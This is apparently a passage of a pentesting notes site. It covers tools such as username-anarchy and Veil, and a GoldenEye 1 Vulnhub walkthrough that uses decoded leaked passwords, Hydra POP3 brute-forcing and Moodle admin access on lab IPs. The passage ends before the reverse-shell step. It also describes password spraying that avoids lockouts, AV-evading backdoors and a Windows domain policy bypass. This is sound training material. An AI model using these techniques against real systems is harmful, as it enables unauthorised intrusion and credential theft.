    Download from github repo: https://github.com/Densaugeo/uploadserver.

    python3 -m pip install --user uploadserver\n
    ","tags":["file transfer technique","server"]},{"location":"uploadserver/#basic-usage","title":"Basic usage","text":"
    python3 -m uploadserver\n

    Accepts the same options as http.server. After the server starts, the upload page is at /upload. For example, if the server is running at http://localhost:8000/ go to http://localhost:8000/upload .

    Now supports uploading multiple files at once! Select multiple files in the web page's file selector, or upload with cURL:

    curl -X POST http://127.0.0.1:8000/upload -F 'files=@multiple-example-1.txt' -F 'files=@multiple-example-2.txt'\n

    See an example in File Transfer techniques for Linux.

    ","tags":["file transfer technique","server"]},{"location":"username-anarchy/","title":"Username Anarchy","text":"

    Ruby-based tool for generating usernames.

    This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users' names. By attempting a few weak passwords across a large set of user accounts, user account lockout thresholds can be avoided.

    "},{"location":"username-anarchy/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/urbanadventurer/username-anarchy.

    git clone https://github.com/urbanadventurer/username-anarchy.git\n
    "},{"location":"username-anarchy/#basic-usage","title":"Basic usage","text":"
    cd username-anarchy\n./username-anarchy -i /home/ltnbob/realnames.txt \n
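    To target a specific naming convention, the tool also exposes format options (flag and format names taken from the project README; treat them as assumptions and verify with --help):

    # List the supported username formats\n./username-anarchy --list-formats\n\n# Generate only first.last style usernames\n./username-anarchy -i /home/ltnbob/realnames.txt --select-format first.last\n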
    "},{"location":"veil/","title":"veil","text":"","tags":["pentesting","web pentesting"]},{"location":"veil/#installation","title":"Installation","text":"

    Repository: https://github.com/Veil-Framework/Veil/

    Quick install for kali:

    apt update\napt install -y veil\n/usr/share/veil/config/setup.sh --force --silent\n

    To run veil:

    veil\n
    ","tags":["pentesting","web pentesting"]},{"location":"veil/#usage-and-basic-command","title":"Usage and basic command","text":"

    Tool \"Evasion\" creates undetectable backdoors.

    \"Ordenance\" is the payload part that we will launch to this backdoor.

    Reading list:

    • https://www.zonasystem.com/2020/07/shellter-veil-evasion-evasion-de-antivirus-ocultando-shellcodes-de-binarios.html
    • https://www.hackingloops.com/veil-evasion-virustotal/

    One nice thing about Veil is that it provides a Metasploit RC file, meaning that in order to launch the multi/handler you just need to run:

    msfconsole -r path/to/metasploitRCfile\n
    ","tags":["pentesting","web pentesting"]},{"location":"vim/","title":"Vim - A text editor","text":""},{"location":"vim/#open-a-file","title":"Open a file","text":"

    To open a file for editing:

    nvim <file>\n

    Open a file in a recovery mode:

    nvim -r <file>\n
    "},{"location":"vim/#go-to-insert-mode","title":"Go to INSERT mode","text":"

    To enter INSERT mode, press one of the following keys and start writing:

    • a : Cursor after the character.
    • i : Cursor before the character.
    • A : Cursor at the end of the line.
    • I : Cursor at the beginning of the line.

    To get out of INSERT mode, press ESC.

    "},{"location":"vim/#browsing-the-file-in-cursor-mode","title":"Browsing the file in CURSOR mode","text":"
    • :2 or 2G : Go to line 2 of the file.
    • gg : Go to the first line of the file.
    • G : Go to the last line.
    • nG : Go to line n.
    • 0 : Go to the beginning of the line.
    • $ : Go to the end of the line.
    "},{"location":"vim/#delete-cut-in-cursor-mode","title":"Delete (cut) in CURSOR mode","text":"

    There is no plain delete in CURSOR mode: deleting always CUTs the content. There is also no need to enter INSERT mode to remove text. You can delete text in CURSOR mode with these keys:

      • x : Cut character.
      • dd : Cut full line.
      • dw : Cut word.
      • d$ : Cut from the cursor position to the end of the line.
      • d<n>w : Cut n words from the cursor position. For instance, \"d3w\" cuts three words.
      • d<n>d : Cut n lines from the cursor position. For instance, \"d4d\" cuts four lines.
      • ciw : Cut (change) the word under the cursor regardless of the cursor's position within it, even inside parentheses or quotes.
      • yw : Copy word.
      • yy : Copy full line.
      • Tip: We can multiply any command to run multiple times by adding a number before it. For example, \"4yw\" would copy 4 words instead of one, and so on.

        "},{"location":"vim/#select-text","title":"Select text","text":"

        To select content in CURSOR mode you need to change to VISUAL mode.

        • v : Changes from CURSOR mode to VISUAL mode.
        • V : Changes from CURSOR mode to VISUAL mode AND select the line where the cursor was.

        Being in VISUAL mode you can:

        • Select lines with cursor position (Up and Down arrows).
        • w : Select a word.
        "},{"location":"vim/#replace-in-cursor-mode","title":"Replace in CURSOR mode","text":"
        • R : Enter REPLACE mode: the text you type overwrites the existing text.
        "},{"location":"vim/#copy-in-cursor-mode","title":"Copy in CURSOR mode","text":"

        To copy into the clip:

        • y : Copy selected content into the clip.
        "},{"location":"vim/#paste-in-cursor-mode","title":"Paste in CURSOR mode","text":"

        Everything you delete goes to the clip. To paste in CURSOR mode, press key:

        • p : Paste clip in the next line.
        • P : Paste clip in previous line.
        "},{"location":"vim/#insert-a-line-in-cursor-mode","title":"Insert a line in CURSOR mode","text":"

        Press these keys:

        • o : Add a line under cursor position.
        • O : Add a line before cursor position.
        "},{"location":"vim/#undo-and-redo-changes-in-cursor-mode","title":"Undo and Redo changes in CURSOR mode","text":"

        You can do and undo changes from CURSOR mode with these keys:

        • u : Undo changes.
        • CTRL+r : Redo changes.
        "},{"location":"vim/#close-a-file","title":"Close a file","text":"

        If there were no modifications, close the file without saving:

        # Press Esc key to enter CURSOR mode.\n:q\n# Hit ENTER\n

        If there were modifications that you don't want to save:

        # Press Esc key to enter CURSOR mode.\n:q!\n# Hit ENTER\n
        "},{"location":"vim/#save-a-file","title":"Save a file","text":"

        To save the file and continue editing:

        # Press Esc key to enter CURSOR mode.\n:w\n# Hit ENTER\n

        To save the file and quit the editor:

        # Press Esc key to enter CURSOR mode.\n:wq!\n# Hit ENTER\n

        Also, you can:

        # Press Esc key to enter CURSOR mode.\n:x\n# Hit ENTER\n

        To save the file with a different name:

        # Press ESC key to enter CURSOR mode.\n:w <newFileName>\n# Hit ENTER\n
        "},{"location":"vim/#browsing-activities-in-the-editor","title":"Browsing activities in the editor","text":"

        The keys g+d jump to the definition of a variable/function in the current file. The keys g+f open the file whose name is under the cursor, even if it's a different file from the one we have open. Our browsing activity piles up in the VIM editor's jump list.

        To switch between activities:

        • CTRL+o : Go back into the browsing activity.
        • CTRL+i : Go forward.
        "},{"location":"vim/#search-in-cursor-mode","title":"Search in CURSOR mode","text":"

        Search from cursor position with:

        • /expression : Search forward for expression.
        • n : Go to the next occurrence.
        • N : Go to previous occurrence.
        • ESC : Escape the search.
        "},{"location":"vim/#browsing-from-opening-and-closing-tags","title":"Browsing from opening and closing tags","text":"

        Move the cursor position from a closing parenthesis to the opening one:

        • % : Jump between matching opening and closing delimiters: () [] {}
        "},{"location":"vim/#substitute-in-cursor-mode","title":"Substitute in CURSOR mode","text":"

        To change \"expresion1\" to \"expresion2\" for the first occurrence:

        # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2\n

        To change all occurrences on the current line:

        # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2/g\n

        To change all occurrences in the document (not asking one by one):

        # Press ESC key to enter CURSOR mode.\n:%s/expression1/expression2/g\n

        To change all occurrences in the document asking one by one:

        # Press ESC key to enter CURSOR mode.\n:%s/expression1/expression2/gc\n
        "},{"location":"virtualbox/","title":"VirtualBox and Extension Pack","text":"

        How to install the Extension Pack manually, bypassing possible policies existing in a Windows DC.

        1. Download the .vbox-extpack file. It is actually just a .tar.gz archive, so its contents can be unpacked (see the sketch below).
        2. Place these contents in the ExtensionPacks subdirectory of the VirtualBox installation directory, typically C:\\Program Files\\Oracle\\VirtualBox
        3. That's it. Run VirtualBox and click on Install extension in the corresponding section. Installation will now succeed.
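        A minimal sketch for step 1 (the filename is hypothetical):

        # A .vbox-extpack is just a gzipped tar archive\nmkdir extpack\ntar -xzf Oracle_VM_VirtualBox_Extension_Pack.vbox-extpack -C extpack\n# Copy the extracted contents into the ExtensionPacks subdirectory\n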
        ","tags":["windows","bypass techniques"]},{"location":"virtualbox/#how-to-enlarge-a-virtual-machines-disk-in-virtualbox","title":"How to Enlarge a Virtual Machine\u2019s Disk in VirtualBox","text":"

        In VirtualBox, go to File > Virtual Media Manager and use the slider to adjust the disk size. In VMware, right-click your virtual machine (VM), then go to Settings > Hard Disk > Expand, and expand the disk. Finally, boot your VM and expand the partition using GParted on Linux or Disk Management on Windows.
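        The resize can also be done from the command line with VBoxManage (the disk path is hypothetical; --resize takes the new size in MB and only grows dynamically allocated VDI/VHD disks):

        VBoxManage modifymedium disk \"~/VirtualBox VMs/kali/kali.vdi\" --resize 80000\n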

        ","tags":["windows","bypass techniques"]},{"location":"vnstat/","title":"vnstat - Monitoring network impact","text":"","tags":["network","bash","tools"]},{"location":"vnstat/#installation","title":"Installation","text":"
        sudo apt install vnstat    \n
        ","tags":["network","bash","tools"]},{"location":"vnstat/#basic-usage","title":"Basic usage","text":"

        Monitor the eth0 network adapter before running a Nessus scan:

        sudo vnstat -l -i eth0\n
        ","tags":["network","bash","tools"]},{"location":"vpn/","title":"VPN notes","text":"

        There are two main types of remote access VPNs: client-based VPN and SSL VPN. SSL VPN uses the web browser as the VPN client.

        Usage of a VPN service does not guarantee anonymity or privacy but is useful for bypassing certain network/firewall restrictions or when connected to a possible hostile network.

        When connected to any penetration testing/hacking-focused lab, we should always consider the network to be \"hostile.\" We should only connect from a virtual machine, disallow password authentication if SSH is enabled on our attacking VM, lockdown any web servers, and not leave sensitive information on our attack VM.
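        For instance, disallowing SSH password authentication on the attack VM comes down to one sshd_config setting:

        # Force key-based authentication only, then restart the service\nsudo sed -i 's/^#*PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config\nsudo systemctl restart ssh\n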

        DO NOT use the same VM that we use to perform client assessments to play CTFs on any platform.

        # Show us the networks accessible via the VPN.\n netstat -rn\n
        ","tags":["vpn"]},{"location":"vulnerability-assessment/","title":"Vulnerability assessment","text":"

        Tools: nessus, openvas

        ","tags":["pentesting","assessment","openvas","nessus"]},{"location":"vulnhub-goldeneye-1/","title":"Walkthrough - GoldenEye 1, a vulnhub machine","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#about-the-machine","title":"About the machine","text":"data Machine GoldenEye 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq Download Mirror https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova Size 805 MB Author creosote Release date 4 May 2018 Description OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. Difficulty Easy","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#walkthrough","title":"Walkthrough","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces (a VBoxManage sketch of this NIC setup follows the lists):

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        GoldenEye 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.
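        The same NIC setup can be scripted with VBoxManage (the VM names and the host-only adapter name are assumptions; adjust them to your setup):

        # Attacker: NIC1 in NAT mode, NIC2 in host-only mode\nVBoxManage modifyvm \"Kali\" --nic1 nat --nic2 hostonly --hostonlyadapter2 vboxnet0\n\n# Victim: single host-only NIC\nVBoxManage modifyvm \"GoldenEye1\" --nic1 hostonly --hostonlyadapter1 vboxnet0\n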
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-we-need-to-identify-our-ip-and-afterwards-our-ips-victim-address","title":"First, we need to identify our IP, and afterwards our IP's victim address.","text":"

        For that we'll be using netdiscover.

        ip a\n

        eth1 interface of the attacker machine will be: 192.168.56.105.

        sudo netdiscover -i eth1 -r 192.168.56.0/24\n

        Results:

         3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180\n _____________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      \n -----------------------------------------------------------------------------\n 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor\n 192.168.56.100  08:00:27:66:9a:ab      1      60  PCS Systemtechnik GmbH\n 192.168.56.101  08:00:27:dd:34:ac      1      60  PCS Systemtechnik GmbH\n

        So, the victim's IP address is: 192.168.56.101.

        Secondly, let's run a port scan to see the services:

        nmap -p- -A 192.168.56.101\n

        And results:

        Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:31 EST\nNmap scan report for 192.168.56.101\nHost is up (0.00013s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE  VERSION\n25/tcp    open  smtp     Postfix smtpd\n|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu\n| Not valid before: 2018-04-24T03:22:34\n|_Not valid after:  2028-04-21T03:22:34\n|_ssl-date: TLS randomness does not represent time\n80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: GoldenEye Primary Admin Server\n|_http-server-header: Apache/2.4.7 (Ubuntu)\n55006/tcp open  ssl/pop3 Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP USER UIDL PIPELINING AUTH-RESP-CODE CAPA\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n55007/tcp open  pop3     Dovecot pop3d\n|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS SASL(PLAIN) USER CAPA PIPELINING TOP UIDL\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 40.89 seconds\n

        As there is an Apache server, let's see what is in there. We'll be opening http://192.168.56.101 in our browser.

        On the front page we are given a URL to log in: /sev-home/. Looking at the source code, in the terminal.js file we can read a commented-out section:

        //\n//Boris, make sure you update your default password. \n//My sources say MI6 maybe planning to infiltrate. \n//Be on the lookout for any suspicious network traffic....\n//\n//I encoded you p@ssword below...\n//\n//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\n//\n//BTW Natalya says she can break your codes\n//\n

        Now we have two usernames, boris and natalya, and we also have an apparently HTML-entity-encoded password. Using Burp Decoder, we can extract the password: InvincibleHack3r
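        The same decoding works without Burp, since the password is just HTML numeric character references:

        python3 -c 'import html; print(html.unescape(\"&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\"))'\n# InvincibleHack3r\n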

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-now-we-can-browse-to-http19216856101sev-home","title":"Third, now we can browse to http://192.168.56.101/sev-home","text":"

        A Basic-Authentication pop-up will be displayed. To log into the system, enter the following credentials (a quick curl check follows the list):

        • user: boris
        • password: InvincibleHack3r
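        We can verify the credentials from the command line first (a 200 response confirms the Basic Auth login works):

        curl -I -u boris:InvincibleHack3r http://192.168.56.101/sev-home/\n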
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-in-the-landing-page-we-can-read-this-valuable-information","title":"Fourth, in the landing page we can read this valuable information:","text":"

        \"Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port\".

        Also by looking at the source code we can read this commented line:

        <!-- Qualified GoldenEye Network Operator Supervisors: Natalya Boris -->\n

        Hmmm, so both Natalya and Boris are supervisors.

        As we know there are high ports (55006 and 55007) open and running the Dovecot POP3 service, we can try to access it with telnet on port 55007. Alternatively, we could have used netcat.

        telnet 192.168.56.101 55007\n

        Results:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASSWORD InvincibleHack3r\n-ERR Unknown command.\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\nUSER natalya\n+OK\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-lets-try-to-brute-force-the-service-by-using-hydra","title":"Fifth, let's try to brute-force the service by using hydra.","text":"
        hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

        And the results:

        Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:57:42\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 14:00:19\n

        We do the same for the user natalya.

        hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

        And the results:

        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 13:45:18\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: natalya   password: bird\n[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-19 13:47:19\n

        So now, we have these credentials for the Dovecot POP3 service:

        • user: boris
        • password: secret1!

        • user: natalya
        • password: bird
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-lets-access-dovecot-pop3-service","title":"Sixth, let's access dovecot pop3 service","text":"

        We can use telnet as before:

        telnet 192.168.56.101 55007\n

        Results:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASS secret1!\n+OK Logged in.\n

        Now let's list all the messages in our inbox:

        # List messages in inbox\nLIST\n

        Results:

        +OK 3 messages:\n1 544\n2 373\n3 921\n.\n

        Now let's retrieve the messages from the inbox with RETR:

        # For retrieving the first message:\nRETR 1\n\n# For retrieving the second message:\nRETR 2\n\n# For retrieving the third message:\nRETR 3\n\n# LIST reported only three messages, so higher message numbers return an error\n

        And messages are:

        RETR 1\n+OK 544 octets\nReturn-Path: <root@127.0.0.1.goldeneye>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id D9E47454B1\n        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nMessage-Id: <20180425022326.D9E47454B1@ubuntu>\nDate: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nFrom: root@127.0.0.1.goldeneye\n\nBoris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.\n.\nRETR 2\n+OK 373 octets\nReturn-Path: <natalya@ubuntu>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id C3F2B454B1\n        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nMessage-Id: <20180425024249.C3F2B454B1@ubuntu>\nDate: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nFrom: natalya@ubuntu\n\nBoris, I can break your codes!\n.\nRETR 3\n+OK 921 octets\nReturn-Path: <alec@janus.boss>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from janus (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id 4B9F4454B1\n        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nMessage-Id: <20180425025235.4B9F4454B1@ubuntu>\nDate: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nFrom: alec@janus.boss\n\nBoris,\n\nYour cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!\n\nOnce Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....\n\nPS - Keep security tight or we will be compromised.\n\n.\nRETR 5\n-ERR There's no message 5.\n

        Now, let's do the same for natalya:

        \u2514\u2500$ telnet 192.168.56.101 55007\nTrying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser natalya\n+OK\npass bird\n+OK Logged in.\nlist\n+OK 2 messages:\n1 631\n2 1048\n.\nretr 1\n+OK 631 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id D5EDA454B1\n        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nMessage-Id: <20180425024542.D5EDA454B1@ubuntu>\nDate: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nFrom: root@ubuntu\n\nNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.\n\nAlso, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.\n.\nretr 2\n+OK 1048 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from root (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 17C96454B1\n        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nMessage-Id: <20180425031956.17C96454B1@ubuntu>\nDate: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nFrom: root@ubuntu\n\nOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of \"security\"...it'll get the change order escalated without much hassle :)\n\nOk, user creds are:\n\nusername: xenia\npassword: RCP90rulez!\n\nBoris verified her as a valid contractor so just create the account ok?\n\nAnd if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir\n**Make sure to edit your host file since you usually work remote off-network....\n\nSince you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.\n.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#exploitation","title":"Exploitation","text":"

Somehow, without really being aware of it, we have already entered the exploitation phase. In this phase, our findings take us further until we eventually gain access to the system.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-use-credentials-to-access-the-webservice","title":"First, use credentials to access the webservice","text":"

        From our reconnaissance / exploitation of the dovecot pop3 service we have managed to gather these new credentials:

        • username: xenia
        • password: RCP90rulez!

        And we also have the instruction to add this line to our /etc/hosts file:

# We open the /etc/hosts file and add this line at the end\n# (note: /etc/hosts maps hostnames only, so the /gnocertdir path must not be included)\n192.168.56.101  severnaya-station.com\n

Now, in our browser we can go to http://severnaya-station.com/gnocertdir and confirm that a Moodle CMS is running. We can log in using the credentials for the user xenia.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#second-gather-information-and-try-to-exploit-it","title":"Second, gather information and try to exploit it","text":"

Browsing around we can retrieve the names of two other users:

        With these two new users in mind we can use hydra again to try to brute force them. Run in two separate tabs:

        hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\nhydra -l admin -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3 \n

        And we obtain results only for the username doak:

        Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 12:07:05\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: doak   password: goat\n1 of 1 target successfully completed, 1 valid password found\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-login-into-dovecot-using-the-credentials-found","title":"Third, login into dovecot using the credentials found","text":"
        • user: doak
        • password: goat

        And now, let's read the messages:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser doak\n+OK\npass goat\n+OK Logged in.\nlist\n+OK 1 messages:\n1 606\n.\nretr 1\n+OK 606 octets\nReturn-Path: <doak@ubuntu>\nX-Original-To: doak\nDelivered-To: doak@ubuntu\nReceived: from doak (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 97DC24549D\n        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nMessage-Id: <20180425034731.97DC24549D@ubuntu>\nDate: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nFrom: doak@ubuntu\n\nJames,\nIf you're reading this, congrats you've gotten this far. You know how tradecraft works right?\n\nBecause I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......\n\nusername: dr_doak\npassword: 4England!\n\n.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-log-into-moodle-with-new-credentials-and-browse-the-service","title":"Fourth, Log into moodle with new credentials and browse the service","text":"

As we have disclosed yet another credential for the Moodle site, let's log in and see what we can find:

        • username: dr_doak
        • password: 4England!

After browsing around as user dr_doak we can download a file with some more information:

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-analyse-the-image","title":"Fifth, analyse the image","text":"

        An image in a secret location is shared with us. Let's download it from http://severnaya-station.com/dir007key/for-007.jpg

Apparently this image has nothing juicy, but if we look at its metadata with exiftool, then... magic happens:

        exiftool for-007.jpg \n

        Results:

        ExifTool Version Number         : 12.49\nFile Name                       : for-007.jpg\nDirectory                       : Downloads\nFile Size                       : 15 kB\nFile Modification Date/Time     : 2023:01:19 12:37:35-05:00\nFile Access Date/Time           : 2023:01:19 12:37:35-05:00\nFile Inode Change Date/Time     : 2023:01:19 12:37:35-05:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image/jpeg\nJFIF Version                    : 1.01\nX Resolution                    : 300\nY Resolution                    : 300\nExif Byte Order                 : Big-endian (Motorola, MM)\nImage Description               : eFdpbnRlcjE5OTV4IQ==\nMake                            : GoldenEye\nResolution Unit                 : inches\nSoftware                        : linux\nArtist                          : For James\nY Cb Cr Positioning             : Centered\nExif Version                    : 0231\nComponents Configuration        : Y, Cb, Cr, -\nUser Comment                    : For 007\nFlashpix Version                : 0100\nImage Width                     : 313\nImage Height                    : 212\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)\nImage Size                      : 313x212\nMegapixels                      : 0.066\n

One field catches our attention: "Image Description". The value of that field is not very... descriptive: eFdpbnRlcjE5OTV4IQ==.

The two equal signs at the end suggest that base64 encoding (not encryption) is probably being used. Let's use BurpSuite to decode it.
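
Alternatively, a quick command-line check (a minimal sketch; the base64 utility ships with coreutils):

echo 'eFdpbnRlcjE5OTV4IQ==' | base64 -d\n# Output: xWinter1995x!\n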

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-now-we-can-login-into-the-moodle-with-admin-credentials","title":"Sixth, now we can login into the moodle with admin credentials","text":"
        • user: admin
        • password: xWinter1995x!

As we are admin, we can browse in the sidebar to: Settings > Site administration > Server > Environment. There we can grab the banner with the version of the running Moodle: 2.2.3.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#seventh-google-for-some-exploits-for-moodle-223","title":"Seventh, google for some exploits for moodle 2.2.3","text":"

        You can get to these results:

        • https://www.rapid7.com/db/modules/exploit/multi/http/moodle_cmd_exec/.
        • https://www.exploit-db.com/exploits/29324

Here is an explanation of the vulnerability: Moodle 2.2.3 has a spellchecking plugin. When creating a blog entry (for instance), the user can click on a button to check the spelling. In the backend, this triggers a connection to a service. The vulnerability is that an admin user can modify the path to that service to include a one-line reverse shell, which gets called when you click on the Check spelling button. For this to work, open a netcat listener on your machine. Also, in the plugin settings, you might need to change the configuration.
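
If you wanted to do this manually instead of with Metasploit, a rough sketch would be the following (assuming the attacker machine is at 192.168.56.102 and listens on port 4444, as in other labs in this repo; the exact location of the spellcheck path setting may vary in Moodle 2.2.3):

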